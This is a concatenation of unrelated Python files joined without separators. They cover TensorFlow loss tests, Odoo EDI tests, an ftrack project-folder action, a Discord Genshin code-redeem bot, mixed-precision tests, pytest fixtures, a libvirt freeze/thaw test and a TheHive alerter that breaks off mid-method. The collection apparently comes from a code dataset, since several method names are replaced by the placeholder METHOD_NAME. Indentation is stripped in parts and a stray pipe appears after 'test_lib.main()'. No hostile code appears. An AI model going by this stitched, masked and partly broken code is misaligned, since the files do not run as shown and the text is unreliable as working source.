      loss = distribution.reduce("SUM", per_replica_losses, axis=None)
      self.assertAllClose(
          self.evaluate(loss), (2. * 0.3 + 0.5 * 0.7 + 4. * 0.2 + 1. * 0.8) / 2)

  def testComputeAverageLossInvalidSampleWeights(self):
    # Weights of a different shape than the losses must be rejected.
    with self.assertRaisesRegex(ValueError,
                                "weights can not be broadcast to values"):
      nn_impl.compute_average_loss([2.5, 6.2, 5.],
                                   sample_weight=[0.2, 0.8],
                                   global_batch_size=10)

  @combinations.generate(
      combinations.combine(
          distribution=[
              strategy_combinations.mirrored_strategy_with_cpu_1_and_2
          ],
          mode=["graph", "eager"]))
  def testComputeAverageLossDtype(self, distribution):
    # The loss dtype must follow the input dtype (float64 here).
    with distribution.scope():
      per_example_loss = constant_op.constant([2., 4., 6.],
                                              dtype=dtypes.float64)
      per_replica_losses = distribution.experimental_run_v2(
          nn_impl.compute_average_loss,
          args=(per_example_loss,),
          kwargs={"sample_weight": 2})
      loss = distribution.reduce("SUM", per_replica_losses, axis=None)
      self.assertEqual(loss.dtype, dtypes.float64)

  def testComputeAverageLossInvalidRank(self):
    # Scalar (rank-0) losses are rejected both statically and dynamically.
    per_example_loss = constant_op.constant(2)
    # Static rank
    with self.assertRaisesRegex(
        ValueError, "Invalid value passed for `per_example_loss`. "
        "Expected a tensor with at least rank 1,"):
      nn_impl.compute_average_loss(per_example_loss)
    with context.graph_mode():
      # Dynamic rank
      per_example_loss = array_ops.placeholder(dtype=dtypes.float32)
      loss = nn_impl.compute_average_loss(per_example_loss)
      with self.cached_session() as sess:
        with self.assertRaisesRegex(
            errors.InvalidArgumentError,
            "Invalid value passed for `per_example_loss`. "
            "Expected a tensor with at least rank 1."):
          sess.run(loss, {per_example_loss: 2})

  @combinations.generate(
      combinations.combine(
          distribution=[
              strategy_combinations.mirrored_strategy_with_cpu_1_and_2
          ],
          mode=["graph", "eager"]))
  def testComputeAverageLossInCrossReplicaContext(self, distribution):
    # Calling outside a replica context is a usage error.
    with distribution.scope():
      with self.assertRaisesRegex(
          RuntimeError,
          "You are calling `compute_average_loss` in cross replica context"):
        nn_impl.compute_average_loss([2, 3])

  @combinations.generate(
      combinations.combine(
          distribution=[
              strategy_combinations.mirrored_strategy_with_cpu_1_and_2
          ],
          mode=["graph", "eager"]))
  def testScaleRegularizationLoss(self, distribution):
    # Without strategy - num replicas = 1
    reg_losses = constant_op.constant([2.5, 6.2, 5.])
    loss = nn_impl.scale_regularization_loss(reg_losses)
    self.assertAllClose(self.evaluate(loss), (2.5 + 6.2 + 5.))
    # With strategy - num replicas = 2
    with distribution.scope():
      per_replica_losses = distribution.experimental_run_v2(
          nn_impl.scale_regularization_loss, args=(reg_losses,))
      loss = distribution.reduce("SUM", per_replica_losses, axis=None)
      self.assertAllClose(self.evaluate(loss), (2.5 + 6.2 + 5.))

  @combinations.generate(
      combinations.combine(
          distribution=[
              strategy_combinations.mirrored_strategy_with_cpu_1_and_2
          ],
          mode=["graph", "eager"]))
  def testScaleRegularizationLossInCrossReplicaContext(self, distribution):
    # Calling outside a replica context is a usage error.
    with distribution.scope():
      with self.assertRaisesRegex(
          RuntimeError, "You are calling `scale_regularization_loss` in "
          "cross replica context"):
        nn_impl.scale_regularization_loss([2, 3])
if __name__ == "__main__":
test_lib.main() |
# Copyright 2020 ACSONE
# @author: Simone Orsi <simahawk@gmail.com>
# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl).
import mock
from freezegun import freeze_time
from odoo import fields, tools
from odoo.exceptions import UserError
from .common import EDIBackendCommonComponentRegistryTestCase
from .fake_components import FakeOutputChecker, FakeOutputGenerator, FakeOutputSender
class EDIBackendTestCase(EDIBackendCommonComponentRegistryTestCase):
    """Tests generating and sending outbound EDI exchange records using
    the fake generator/sender/checker components."""

    @classmethod
    def setUpClass(cls):
        super().setUpClass()
        cls._build_components(
            # TODO: test all components lookup
            cls,
            FakeOutputGenerator,
            FakeOutputSender,
            FakeOutputChecker,
        )
        vals = {
            "model": cls.partner._name,
            "res_id": cls.partner.id,
        }
        # Shared outbound record used by most tests below.
        cls.record = cls.backend.create_record("test_csv_output", vals)

    def setUp(self):
        super().setUp()
        # Reset call tracking on the fake components between tests.
        FakeOutputGenerator.reset_faked()
        FakeOutputSender.reset_faked()
        FakeOutputChecker.reset_faked()

    def test_generate_record_output(self):
        # The fake generator echoes the `fake_output` context value.
        self.backend.with_context(fake_output="yeah!").exchange_generate(self.record)
        self.assertEqual(self.record._get_file_content(), "yeah!")

    def test_generate_record_output_pdf(self):
        # Binary (PDF) payloads must pass through generation unharmed.
        result = tools.file_open(
            "result.pdf", subdir="addons/edi_oca/tests", mode="rb"
        ).read()
        self.backend.with_context(fake_output=result).exchange_generate(self.record)

    def test_send_record(self):
        # A pending record with content is sent and timestamped.
        self.record.write({"edi_exchange_state": "output_pending"})
        self.record._set_file_content("TEST %d" % self.record.id)
        self.assertFalse(self.record.exchanged_on)
        with freeze_time("2020-10-21 10:00:00"):
            self.record.action_exchange_send()
        self.assertTrue(FakeOutputSender.check_called_for(self.record))
        self.assertRecordValues(self.record, [{"edi_exchange_state": "output_sent"}])
        self.assertEqual(
            fields.Datetime.to_string(self.record.exchanged_on), "2020-10-21 10:00:00"
        )

    def METHOD_NAME(self):
        # A send failure moves the record to the error state and stores
        # the error message.
        self.record.write({"edi_exchange_state": "output_pending"})
        self.record._set_file_content("TEST %d" % self.record.id)
        self.assertFalse(self.record.exchanged_on)
        self.record.with_context(
            test_break_send="OOPS! Something went wrong :("
        ).action_exchange_send()
        self.assertTrue(FakeOutputSender.check_called_for(self.record))
        self.assertRecordValues(
            self.record,
            [
                {
                    "edi_exchange_state": "output_error_on_send",
                    "exchange_error": "OOPS! Something went wrong :(",
                }
            ],
        )

    def test_send_invalid_direction(self):
        # Inbound records must refuse to be sent.
        vals = {
            "model": self.partner._name,
            "res_id": self.partner.id,
        }
        record = self.backend.create_record("test_csv_input", vals)
        with mock.patch.object(type(self.backend), "_exchange_send") as mocked:
            mocked.return_value = "AAA"
            with self.assertRaises(UserError) as err:
                record.action_exchange_send()
            self.assertEqual(
                err.exception.args[0],
                "Record ID=%d is not meant to be sent!" % record.id,
            )
            mocked.assert_not_called()

    def test_send_not_generated_record(self):
        # Records without generated content must refuse to be sent.
        vals = {
            "model": self.partner._name,
            "res_id": self.partner.id,
        }
        record = self.backend.create_record("test_csv_output", vals)
        with mock.patch.object(type(self.backend), "_exchange_send") as mocked:
            mocked.return_value = "AAA"
            with self.assertRaises(UserError) as err:
                record.action_exchange_send()
            self.assertEqual(
                err.exception.args[0], "Record ID=%d has no file to send!" % record.id
            )
            mocked.assert_not_called()
import re
from openpype.pipeline.project_folders import (
get_project_basic_paths,
create_project_folders,
)
from openpype_modules.ftrack.lib import BaseAction, statics_icon
class CreateProjectFolders(BaseAction):
"""Action create folder structure and may create hierarchy in Ftrack.
Creation of folder structure and hierarchy in Ftrack is based on presets.
These presets are located in:
`~/pype-config/presets/tools/project_folder_structure.json`
Example of content:
```json
{
"__project_root__": {
"prod" : {},
"resources" : {
"footage": {
"plates": {},
"offline": {}
},
"audio": {},
"art_dept": {}
},
"editorial" : {},
"assets[ftrack.Library]": {
"characters[ftrack]": {},
"locations[ftrack]": {}
},
"shots[ftrack.Sequence]": {
"scripts": {},
"editorial[ftrack.Folder]": {}
}
}
}
```
Key "__project_root__" indicates root folder (or entity). Each key in
dictionary represents folder name. Value may contain another dictionary
with subfolders.
Identifier `[ftrack]` in name says that this should be also created in
Ftrack hierarchy. It is possible to specify entity type of item with "." .
If key is `assets[ftrack.Library]` then in ftrack will be created entity
with name "assets" and entity type "Library". It is expected Library entity
type exist in Ftrack.
"""
identifier = "create.project.structure"
label = "Create Project Structure"
description = "Creates folder structure"
role_list = ["Pypeclub", "Administrator", "Project Manager"]
icon = statics_icon("ftrack", "action_icons", "CreateProjectFolders.svg")
pattern_array = re.compile(r"\[.*\]")
pattern_ftrack = re.compile(r".*\[[.]*ftrack[.]*")
pattern_ent_ftrack = re.compile(r"ftrack\.[^.,\],\s,]*")
project_root_key = "__project_root__"
def discover(self, session, entities, event):
if len(entities) != 1:
return False
if entities[0].entity_type.lower() != "project":
return False
return True
def launch(self, session, entities, event):
# Get project entity
project_entity = self.get_project_from_entity(entities[0])
project_name = project_entity["full_name"]
try:
# Get paths based on presets
basic_paths = get_project_basic_paths(project_name)
if not basic_paths:
return {
"success": False,
"message": "Project structure is not set."
}
# Invoking OpenPype API to create the project folders
create_project_folders(project_name, basic_paths)
self.create_ftrack_entities(basic_paths, project_entity)
self.trigger_event(
"openpype.project.structure.created",
{"project_name": project_name}
)
except Exception as exc:
self.log.warning("Creating of structure crashed.", exc_info=True)
session.rollback()
return {
"success": False,
"message": str(exc)
}
return True
def get_ftrack_paths(self, paths_items):
all_ftrack_paths = []
for path_items in paths_items:
ftrack_path_items = []
is_ftrack = False
for item in reversed(path_items):
if item == self.project_root_key:
continue
if is_ftrack:
ftrack_path_items.append(item)
elif re.match(self.pattern_ftrack, item):
ftrack_path_items.append(item)
is_ftrack = True
ftrack_path_items = list(reversed(ftrack_path_items))
if ftrack_path_items:
all_ftrack_paths.append(ftrack_path_items)
return all_ftrack_paths
def compute_ftrack_items(self, in_list, keys):
if len(keys) == 0:
return in_list
key = keys[0]
exist = None
for index, subdict in enumerate(in_list):
if key in subdict:
exist = index
break
if exist is not None:
in_list[exist][key] = self.compute_ftrack_items(
in_list[exist][key], keys[1:]
)
else:
in_list.append({key: self.compute_ftrack_items([], keys[1:])})
return in_list
def METHOD_NAME(self, paths_items):
main = []
for path_items in paths_items:
main = self.compute_ftrack_items(main, path_items)
return main
def create_ftrack_entities(self, basic_paths, project_ent):
only_ftrack_items = self.get_ftrack_paths(basic_paths)
ftrack_paths = self.METHOD_NAME(only_ftrack_items)
for separation in ftrack_paths:
parent = project_ent
self.trigger_creation(separation, parent)
    def trigger_creation(self, separation, parent):
        """Recursively create one level of the ftrack entity tree.

        ``separation`` maps an item label (optionally carrying a bracketed
        "[ftrack.<Type>]" suffix) to a list of child mappings of the same
        shape.
        """
        for item, subvalues in separation.items():
            matches = re.findall(self.pattern_array, item)
            # Default entity type when no "[ftrack.<Type>]" suffix is present.
            ent_type = "Folder"
            if len(matches) == 0:
                name = item
            else:
                match = matches[0]
                # Strip the bracketed suffix to get the plain entity name.
                name = item.replace(match, "")
                ent_type_match = re.findall(self.pattern_ent_ftrack, match)
                if len(ent_type_match) > 0:
                    ent_type_split = ent_type_match[0].split(".")
                    if len(ent_type_split) == 2:
                        ent_type = ent_type_split[1]
            new_parent = self.create_ftrack_entity(name, ent_type, parent)
            if subvalues:
                for subvalue in subvalues:
                    self.trigger_creation(subvalue, new_parent)
    def create_ftrack_entity(self, name, ent_type, parent):
        """Return an existing child entity named ``name`` or create a new one.

        Checks the parent's in-memory children first, then queries the
        server, and only creates (and commits) when neither finds a match.
        """
        for children in parent["children"]:
            if children["name"] == name:
                return children
        data = {
            "name": name,
            "parent_id": parent["id"]
        }
        # A project is its own project; any other entity inherits it.
        if parent.entity_type.lower() == "project":
            data["project_id"] = parent["id"]
        else:
            data["project_id"] = parent["project"]["id"]
        existing_entity = self.session.query((
            "TypedContext where name is \"{}\" and "
            "parent_id is \"{}\" and project_id is \"{}\""
        ).format(name, data["parent_id"], data["project_id"])).first()
        if existing_entity:
            return existing_entity
        new_ent = self.session.create(ent_type, data)
        self.session.commit()
        return new_ent
def register(session):
    """Register the CreateProjectFolders action with the given ftrack session."""
    CreateProjectFolders(session).register()
import asyncio
from typing import List
import discord
import genshin
import sentry_sdk
from apps.db.tables.hoyo_account import HoyoAccount
from apps.text_map import text_map
from dev.base_ui import get_error_handle_embed
from dev.enum import GameType
from dev.exceptions import AccountNotFound
from dev.models import BotModel, DefaultEmbed
from utils import log
from utils.general import get_dc_user
class AutoRedeem:
    def __init__(self, bot: BotModel):
        """
        Initializes the AutoRedeem class.
        Args:
            bot (BotModel): The bot instance.
        """
        self.bot = bot
        # Run statistics: users considered vs. users successfully processed.
        self._total = 0
        self._success = 0
    async def exec(self) -> None:
        """Execute the AutoRedeem process.
        This function retrieves all codes from the database and processes them for all users.
        If no codes are found, the function will exit early.
        Raises:
            Exception: If an error occurs during the process.
        Returns:
            None
        """
        try:
            log.info("[AutoRedeem] Starting")
            codes = await self.bot.db.codes.get_all()
            if not codes:
                # log.info returns None, so this doubles as the early return.
                return log.info("[AutoRedeem] No codes found, skipping")
            users = await self._get_users()
            await self._process_users(users, codes)
        except Exception as e:  # skipcq: PYL-W0703
            log.exception(f"[AutoRedeem] {e}")
            sentry_sdk.capture_exception(e)
        else:
            log.info(f"[AutoRedeem] Redeemed for {self._success}/{self._total} users")
        finally:
            log.info("[AutoRedeem] Finished")
    async def _get_users(self) -> List[HoyoAccount]:
        """Retrieve all users with auto-redeem enabled and their associated accounts.
        This function queries the database for all users with auto-redeem enabled and retrieves
        all of their associated accounts for the Genshin Impact game type. If an account is not found
        for a user, the user is skipped.
        Returns:
            A list of HoyoAccount objects representing all accounts associated with users with
            auto-redeem enabled.
        Raises:
            None
        """
        result: List[HoyoAccount] = []
        users = await self.bot.pool.fetch(
            "SELECT user_id FROM user_settings WHERE auto_redeem = true"
        )
        for user in users:
            try:
                accounts = await self.bot.db.users.get_all_of_user(
                    user["user_id"], GameType.GENSHIN
                )
            except AccountNotFound:
                continue
            else:
                result.extend(accounts)
                # _total counts users (not individual accounts).
                self._total += 1
        return result
    async def _process_users(self, users: List[HoyoAccount], codes: List[str]) -> None:
        """Process the given codes for the given users.
        This function attempts to redeem the given codes for each user in the list of users.
        If a code is successfully redeemed, an embed is created and sent to the user via Discord.
        If an error occurs during the process, the error is logged and the exception is captured by Sentry.
        Args:
            users: A list of HoyoAccount objects representing the users to process.
            codes: A list of strings representing the codes to redeem.
        Returns:
            None
        Raises:
            None
        """
        for user in users:
            try:
                dc_user = await get_dc_user(self.bot, user.user_id)
                embeds = await self._redeem_codes(user, codes, dc_user)
            except Exception as e:  # skipcq: PYL-W0703
                # One failing user must not abort the whole batch.
                log.exception(f"[AutoRedeem] {e}")
                sentry_sdk.capture_exception(e)
            else:
                await self.notify_user(dc_user, embeds)
                self._success += 1
    async def _redeem_codes(
        self, account: HoyoAccount, codes: List[str], discord_user: discord.User
    ) -> List[discord.Embed]:
        """
        Redeems all codes for a given user account.
        Args:
            account (HoyoAccount): The user account to redeem codes for.
            codes (List[str]): The list of codes to redeem.
            discord_user (discord.User): The Discord user to notify.
        Returns:
            List[discord.Embed]: The list of embeds to send to the user.
        """
        embeds: List[discord.Embed] = []
        for code in codes:
            log.info(f"[AutoRedeem] Redeeming {code} for {account.uid}")
            # Skip codes this UID has already redeemed.
            redeemed = await self.bot.db.redeemed.check(account.uid, code)
            if redeemed:
                continue
            embed = await self.METHOD_NAME(account, code, discord_user)
            await self.bot.db.redeemed.insert(account.uid, code)
            embeds.append(embed)
            # Pause between redemptions — presumably to respect the redemption
            # API's rate limit; confirm the required interval.
            await asyncio.sleep(10.0)
        return embeds
    @staticmethod
    async def METHOD_NAME(
        account: HoyoAccount, code: str, user: discord.User
    ) -> discord.Embed:
        """
        Redeems a single code for a given user account.
        Args:
            account (HoyoAccount): The user account to redeem the code for.
            code (str): The code to redeem.
            user (discord.User): The Discord user to notify.
        Returns:
            discord.Embed: The embed to send to the user.
        """
        client = await account.client
        lang = (await account.settings).lang or "en-US"
        try:
            await client.redeem_code(code, account.uid, game=genshin.Game.GENSHIN)
        except Exception as e:  # skipcq: PYL-W0703
            # Failures (invalid/expired code, cookie issues) become an error embed.
            embed = get_error_handle_embed(user, e, lang)
        else:
            embed = DefaultEmbed(
                text_map.get(109, lang),
            )
        if embed.description is None:
            embed.description = ""
        embed.description += f"\n\n{text_map.get(108, lang)}: **{code}**"
        embed.set_footer(text=text_map.get(126, lang))
        return embed
    @staticmethod
    async def notify_user(user: discord.User, embeds: List[discord.Embed]) -> None:
        """
        Notifies a user of the redeemed codes.
        Args:
            user (discord.User): The Discord user to notify.
            embeds (List[discord.Embed]): The list of embeds to send to the user.
        """
        if not embeds:
            return
        try:
            await user.send(embeds=embeds)
        except discord.Forbidden:
            # The user has DMs disabled; skip the notification silently.
            pass
import os
import shutil
import unittest
import numpy as np
from tensorflow import keras
from neural_compressor import mix_precision
from neural_compressor.config import MixedPrecisionConfig
from neural_compressor.data import DataLoader, Datasets
def build_sequential_model():
    """Build, compile and save a small Conv2D classifier to ./models/saved_model."""
    # Create Keras model
    model = keras.Sequential(
        [
            keras.layers.InputLayer(input_shape=(28, 28), name="input"),
            keras.layers.Reshape(target_shape=(28, 28, 1)),
            keras.layers.Conv2D(filters=12, kernel_size=(3, 3), activation="relu"),
            keras.layers.Conv2D(filters=12, kernel_size=(3, 3), activation="relu"),
            keras.layers.Conv2D(filters=12, kernel_size=(3, 3), activation="relu"),
            keras.layers.Conv2D(filters=12, kernel_size=(3, 3), activation="relu"),
            keras.layers.Conv2D(filters=12, kernel_size=(3, 3), activation="relu"),
            keras.layers.MaxPooling2D(pool_size=(2, 2)),
            keras.layers.Flatten(),
            keras.layers.Dense(10, activation="softmax", name="output"),
        ]
    )
    # Print model architecture
    model.summary()
    # Compile model with optimizer
    opt = keras.optimizers.Adam(learning_rate=0.01)
    model.compile(optimizer=opt, loss="sparse_categorical_crossentropy", metrics=["accuracy"])
    model.save("./models/saved_model")
    return
# Define a customized Metric function
from neural_compressor.metric import BaseMetric
class MyMetric(BaseMetric):
    """Accuracy metric accumulated batch by batch."""

    def __init__(self, *args):
        self.pred_list = []
        self.label_list = []
        self.samples = 0

    def update(self, predict, label):
        """Accumulate one batch of predictions and ground-truth labels."""
        self.pred_list.extend(np.argmax(predict, axis=1))
        self.label_list.extend(label)
        self.samples += len(label)

    def reset(self):
        """Drop all accumulated state."""
        self.pred_list = []
        self.label_list = []
        self.samples = 0

    def METHOD_NAME(self):
        """Return accuracy: fraction of predictions equal to labels."""
        matches = np.array(self.pred_list) == np.array(self.label_list)
        return np.sum(matches) / self.samples
class MyMetric_keras(MyMetric):
    """Same accuracy metric; separate class for the keras (itex) backend test."""
    def __init__(self, *args):
        super(MyMetric_keras, self).__init__(*args)
class TestMixedPrecisionWithKerasModel(unittest.TestCase):
    """Mixed-precision conversion tests against a freshly built Keras model."""
    # NOTE(review): classmethods conventionally name the first argument "cls";
    # "self" works here but is unidiomatic.
    @classmethod
    def setUpClass(self):
        # Force-enable fp16/bf16 conversion regardless of hardware support.
        os.environ["FORCE_FP16"] = "1"
        os.environ["FORCE_BF16"] = "1"
        build_sequential_model()
    @classmethod
    def tearDownClass(self):
        del os.environ["FORCE_FP16"]
        del os.environ["FORCE_BF16"]
        shutil.rmtree("./models", ignore_errors=True)
        shutil.rmtree("./nc_workspace", ignore_errors=True)
    def test_mixed_precision_with_keras_model(self):
        # use dummy dataset for UT test
        dataset = Datasets("tensorflow")["dummy"](shape=(10, 28, 28), low=0.0, high=1.0, label=True)
        dataloader = DataLoader(framework="tensorflow", dataset=dataset)
        config = MixedPrecisionConfig()
        q_model = mix_precision.fit(
            model="./models/saved_model", conf=config, eval_dataloader=dataloader, eval_metric=MyMetric()
        )
        # Optional, run quantized model
        import tensorflow as tf
        with tf.compat.v1.Graph().as_default(), tf.compat.v1.Session() as sess:
            tf.compat.v1.import_graph_def(q_model.graph_def, name="")
            out = sess.run(["Identity:0"], feed_dict={"input:0": dataset.dataset})
            print("Inference is done.")
        # A Cast node in the converted graph proves precision was lowered.
        found_cast = False
        for i in q_model.graph_def.node:
            if i.op == "Cast":
                found_cast = True
                break
        self.assertEqual(found_cast, True)
    def test_mixed_precision_with_keras_adaptor(self):
        # use dummy dataset for UT test
        dataset = Datasets("tensorflow")["dummy"](shape=(10, 28, 28), low=0.0, high=1.0, label=True)
        dataloader = DataLoader(framework="tensorflow", dataset=dataset)
        # add backend='itex' to run on keras adaptor
        config = MixedPrecisionConfig(backend="itex")
        bf16_model = mix_precision.fit(
            model="./models/saved_model", config=config, eval_dataloader=dataloader, eval_metric=MyMetric_keras()
        )
        bf16_policy = keras.mixed_precision.Policy("mixed_bfloat16")
        # bf16_model.model is an obj of tf.keras.Model
        model_policy = bf16_model.model.dtype_policy
        conv2d_layer_policy = bf16_model.model.get_layer("conv2d").dtype_policy
        self.assertEqual(model_policy.compute_dtype, bf16_policy.compute_dtype)
        self.assertEqual(conv2d_layer_policy.compute_dtype, bf16_policy.compute_dtype)
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
import time
from collections.abc import (
Callable,
Iterable,
Mapping,
MutableMapping,
)
from pathlib import Path
from typing import (
Any,
Optional,
)
from unittest.mock import create_autospec
import httpretty as _httpretty
import pytest
from pydantic import BaseModel
from pydantic.error_wrappers import ValidationError
from reconcile.gql_definitions.fragments.vault_secret import VaultSecret
from reconcile.test.fixtures import Fixtures
from reconcile.utils.gql import GqlApi
from reconcile.utils.models import data_default_none
from reconcile.utils.state import State
@pytest.fixture
def METHOD_NAME(mocker):
    """Patch time.sleep so tests run without real delays."""
    yield mocker.patch.object(time, "sleep")
@pytest.fixture()
def httpretty():
    """Enable httpretty for the test with all real network access blocked."""
    with _httpretty.enabled(allow_net_connect=False):
        _httpretty.reset()
        yield _httpretty
@pytest.fixture
def secret_reader(mocker):
    """Return a patched SecretReader whose read methods always yield "secret".

    The previous ``-> None`` return annotation was wrong: the fixture returns
    the mock object so tests can make assertions on it.
    """
    mock_secretreader = mocker.patch(
        "reconcile.utils.secret_reader.SecretReader", autospec=True
    )
    mock_secretreader.read.return_value = "secret"
    mock_secretreader.read_secret.return_value = "secret"
    return mock_secretreader
@pytest.fixture
def s3_state_builder() -> Callable[[Mapping], State]:
    """
    Example input data:
    {
        "get": {
            # This maps data being returned by get
            "path/to/item": {
                "some_key": "content",
                "other_content": "content",
            },
            "other/path": {
                "other": "data",
            },
        },
        "ls": [
            "/path/item1",
            "/path/item2",
        ]
    }
    """
    def builder(data: Mapping) -> State:
        def get(key: str, *args) -> dict:
            # Mirror State.get: an optional positional arg acts as a default.
            try:
                return data["get"][key]
            except KeyError:
                if args:
                    return args[0]
                raise
        def __getitem__(self, key: str) -> dict:
            return get(key)
        state = create_autospec(spec=State)
        state.get = get
        state.__getitem__ = __getitem__
        # side_effect with one element: ls() may be called exactly once.
        state.ls.side_effect = [data.get("ls", [])]
        return state
    return builder
@pytest.fixture
def vault_secret():
    """A minimal VaultSecret instance for tests."""
    return VaultSecret(
        path="path/test",
        field="key",
        format=None,
        version=None,
    )
@pytest.fixture
def data_factory() -> (
    Callable[
        [type[BaseModel], Optional[MutableMapping[str, Any]]],
        MutableMapping[str, Any],
    ]
):
    """Set default values to None."""
    def _data_factory(
        klass: type[BaseModel], data: Optional[MutableMapping[str, Any]] = None
    ) -> MutableMapping[str, Any]:
        # Fill every field the model declares but the data omits with None.
        return data_default_none(klass, data or {})
    return _data_factory
class GQLClassFactoryError(Exception):
    """Raised by gql_class_factory when fixture data fails model validation."""
    pass
@pytest.fixture
def gql_class_factory() -> (
    Callable[
        [type[BaseModel], Optional[MutableMapping[str, Any]]],
        BaseModel,
    ]
):
    """Create a GQL class from a fixture and set default values to None."""
    def _gql_class_factory(
        klass: type[BaseModel], data: Optional[MutableMapping[str, Any]] = None
    ) -> BaseModel:
        try:
            return klass(**data_default_none(klass, data or {}))
        except ValidationError as e:
            # Re-raise with every validation error listed, for readable output.
            msg = "[gql_class_factory] Your given data does not match the class ...\n"
            msg += "\n".join([str(m) for m in list(e.raw_errors)])
            raise GQLClassFactoryError(msg) from e
    return _gql_class_factory
@pytest.fixture
def gql_api_builder() -> Callable[[Optional[Mapping]], GqlApi]:
    """Build a GqlApi mock whose query() returns the given data."""
    def builder(data: Optional[Mapping] = None) -> GqlApi:
        gql_api = create_autospec(GqlApi)
        gql_api.query.return_value = data
        return gql_api
    return builder
@pytest.fixture
def set_httpretty_responses_based_on_fixture(httpretty: _httpretty) -> Callable:
    """Create httpretty responses based fixture files."""
    def _(url: str, fx: Fixtures, paths: Iterable[str]) -> None:
        # For every path, register a response per HTTP method for which a
        # "<method>.json" fixture file exists.
        for path in paths:
            for method in ["get", "post", "put", "patch", "delete"]:
                method_file = Path(fx.path(path)) / f"{method}.json"
                if method_file.exists():
                    httpretty.register_uri(
                        getattr(httpretty, method.upper()),
                        f"{url}/{path}",
                        body=method_file.read_text(),
                        content_type="text/json",
                    )
    return _
import aexpect
from virttest import virsh
from virttest.libvirt_xml import vm_xml
from virttest.utils_test import libvirt
def run(test, params, env):
    """
    This test virsh domfsfreeze and domfsthaw commands and their options.
    1) Start a guest with/without guest agent configured;
    2) Freeze the guest file systems with domfsfreeze;
    3) Create a file on guest to see command hang;
    4) Thaw the guest file systems with domfsthaw;
    5) Check the file is already created;
    6) Retouch the file the ensure guest file system are not frozen;
    7) Cleanup test environment.
    """
    def METHOD_NAME(session):
        """
        Check whether file system has been frozen by touch a test file
        and see if command will hang.
        :param session: Guest session to be tested.
        """
        try:
            output = session.cmd_output('touch freeze_test',
                                        timeout=10)
            test.fail("Failed to freeze file system. "
                      "Create file succeeded:\n%s" % output)
        except aexpect.ShellTimeoutError:
            # Expected: a frozen filesystem blocks the write until timeout.
            pass
    def check_thaw(session):
        """
        Check whether file system has been thawed by check a test file
        prohibited from creation when frozen created and successfully touch
        the file again.
        :param session: Guest session to be tested.
        """
        status, output = session.cmd_status_output('ls freeze_test')
        if status:
            test.fail("Failed to thaw file system. "
                      "Find created file failed:\n%s" % output)
        try:
            output = session.cmd_output('touch freeze_test', timeout=10)
        except aexpect.ShellTimeoutError:
            # NOTE(review): this is the thaw-check path, yet the message says
            # "freeze" — looks like a copy-paste slip; confirm intent.
            test.fail("Failed to freeze file system. "
                      "Touch file timeout:\n%s" % output)
    def cleanup(session):
        """
        Clean up the test file used for freeze/thaw test.
        :param session: Guest session to be cleaned up.
        """
        status, output = session.cmd_status_output('rm -f freeze_test')
        if status:
            test.error("Failed to cleanup test file"
                       "Find created file failed:\n%s" % output)
    if not virsh.has_help_command('domfsfreeze'):
        test.cancel("This version of libvirt does not support "
                    "the domfsfreeze/domfsthaw test")
    channel = ("yes" == params.get("prepare_channel", "yes"))
    agent = ("yes" == params.get("start_agent", "yes"))
    mountpoint = params.get("mountpoint", None)
    vm_name = params.get("main_vm")
    vm = env.get_vm(vm_name)
    # Back up the inactive XML so the guest config can be restored afterwards.
    xml_backup = vm_xml.VMXML.new_from_inactive_dumpxml(vm_name)
    try:
        # Add or remove qemu-agent from guest before test
        vm.prepare_guest_agent(channel=channel, start=agent)
        session = vm.wait_for_login()
        try:
            # Expected fail message patterns
            fail_patts = []
            if not channel:
                fail_patts.append(r"QEMU guest agent is not configured")
            if not agent:
                # For older version
                fail_patts.append(r"Guest agent not available for now")
                # For newer version
                fail_patts.append(r"Guest agent is not responding")
            # Message patterns test should skip when met
            skip_patts = [
                r'The command \S+ has not been found',
                r'specifying mountpoints is not supported',
            ]
            res = virsh.domfsfreeze(vm_name, mountpoint=mountpoint)
            libvirt.check_result(res, fail_patts, skip_patts)
            if not res.exit_status:
                METHOD_NAME(session)
            res = virsh.domfsthaw(vm_name, mountpoint=mountpoint)
            libvirt.check_result(res, fail_patts, skip_patts)
            if not res.exit_status:
                check_thaw(session)
                cleanup(session)
        finally:
            session.close()
    finally:
        xml_backup.sync()
import json
import time
import uuid
import requests
from requests import RequestException
from elastalert.alerts import Alerter
from elastalert.util import lookup_es_key, EAException, elastalert_logger
class HiveAlerter(Alerter):
    """
    Use matched data to create alerts containing observables in an instance of TheHive
    """
    required_options = set(['hive_connection', 'hive_alert_config'])
    def lookup_field(self, match: dict, field_name: str, default):
        """Populates a field with values depending on the contents of the Elastalert match
        provided to it.
        Uses a similar algorithm to that implemented to populate the `alert_text_args`.
        First checks any fields found in the match provided, then any fields defined in
        the rule, finally returning the default value provided if no value can be found.
        """
        field_value = lookup_es_key(match, field_name)
        if field_value is None:
            field_value = self.rule.get(field_name, default)
        return field_value
    # Iterate through the matches, building up a list of observables
    def load_observable_artifacts(self, match: dict):
        artifacts = []
        for mapping in self.rule.get('hive_observable_data_mapping', []):
            for observable_type, mapping_key in mapping.items():
                # "tlp", "message" and "tags" are artifact metadata keys, not
                # observable types, so they never start a new artifact.
                if (observable_type != "tlp" and observable_type != "message" and observable_type != "tags"):
                    data = str(self.lookup_field(match, mapping_key, ''))
                    if len(data) != 0:
                        artifact = {'tlp': 2,
                                    'tags': [],
                                    'message': None,
                                    'dataType': observable_type,
                                    'data': data}
                        if mapping.get('tlp') is not None:
                            artifact['tlp'] = mapping['tlp']
                        if mapping.get('message') is not None:
                            artifact['message'] = mapping['message']
                        if mapping.get('tags') is not None:
                            artifact['tags'] = mapping['tags']
                        artifacts.append(artifact)
                    # Only the first non-metadata key of each mapping is used.
                    break
        return artifacts
    def load_custom_fields(self, custom_fields_raw: list, match: dict):
        """Build TheHive customFields dict; 'order' preserves config order."""
        custom_fields = {}
        position = 0
        for field in custom_fields_raw:
            if (isinstance(field['value'], str)):
                value = self.lookup_field(match, field['value'], field['value'])
            else:
                value = field['value']
            custom_fields[field['name']] = {'order': position, field['type']: value}
            position += 1
        return custom_fields
    def METHOD_NAME(self, tag_names: list, match: dict):
        """Resolve configured tags against the match; list values are flattened."""
        tag_values = set()
        for tag in tag_names:
            tag_value = self.lookup_field(match, tag, tag)
            if isinstance(tag_value, list):
                for sub_tag in tag_value:
                    tag_values.add(str(sub_tag))
            else:
                tag_values.add(str(tag_value))
        return tag_values
    def load_args(self, field, raw, match: dict):
        """Format `raw` with the "<field>_args" values resolved from the match,
        then the rule, then the configured missing-value marker."""
        missing = self.rule['hive_alert_config'].get(field + '_missing_value', '<MISSING VALUE>')
        args = field + "_args"
